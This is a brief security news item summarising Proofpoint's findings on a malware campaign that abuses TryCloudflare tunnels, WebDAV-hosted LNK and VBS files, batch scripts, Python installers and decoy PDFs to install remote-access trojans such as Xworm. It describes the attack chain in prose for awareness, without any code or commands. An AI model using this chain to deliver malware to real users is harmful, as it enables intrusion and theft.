Proofpoint has been tracking cybercriminals using Cloudflare Tunnels to distribute malware. Attackers are using the TryCloudflare feature, which allows you to create a one-time tunnel without registering an account. Tunnels are designed to allow remote access to data and resources, similar to VPN or SSH.
The attack chain starts with a message with a link or attachment leading to a URL file. When opened, the file connects to an external file storage via WebDAV to download a LNK or VBS file. Executing the files results in the launch of a BAT or CMD, which downloads a Python installation package and a series of scripts that end with the installation of malware. In some cases, the search-ms protocol is used to obtain LNK files via WebDAV. The attackers often display a harmless PDF on the victim’s screen so that the user does not suspect anything.
Most recent campaigns have resulted in the installation of the Xworm RAT, but AsyncRAT, VenomRAT, GuLoader, and Remcos have also been used in the past. Some campaigns include multiple different malware payloads, with each unique Python script causing the installation of different software.
Source: securitylab.ru
